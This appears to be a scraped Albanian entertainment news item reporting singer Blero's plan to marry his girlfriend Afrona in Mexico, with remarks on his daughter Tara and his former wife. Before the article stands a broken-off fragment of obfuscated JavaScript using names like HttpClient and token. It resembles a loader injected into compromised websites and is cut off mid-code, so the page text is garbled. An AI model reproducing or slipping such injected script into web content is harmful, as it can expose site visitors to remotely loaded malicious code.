;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Blero zbulon vendin se ku do të martohet me Afronën

By

Blero ka qenë i ftuar në emisionin “Oktapod” në Shqipëri. Ai deklaruar në intervistë përballë Turjan Hyskës, se do të martohet në Meksikë, me të dashurën aktuale Afronën.

Gjatë shpjegimeve dhënë në emisionin “Oktapod”, këngëtari ka rrëfyer se kjo martesë është hapi i duhur në momentin e jetës që ai jeton.

Blero shtoi se marrëdhënia e Afronës me vajzën e tij Tara është një marrëdhënie shoqesh dhe se të dyja e kanë pranuar shumë natyrshëm njëra-tjetrën.

Duke konsideruar të mbyllur marrëdhënien me ish bashkëshorten, Blero shprehet se që të dy përpiqen ta sqarojnë raportin e tyre të përfunduar, edhe për vajzën. Këngëtari tregoi se Tarës i ka folur me mençuri edhe ai por edhe Teuta të cilës iu referua si ‘nëna e Tarës’.

Përse i përket jetës së tij në tërësi, Blero shprehet se ndihet sikur Zoti e do dhe preferon ta shijojë jetën në çdo aspekt.

Artikuj të ngjashëm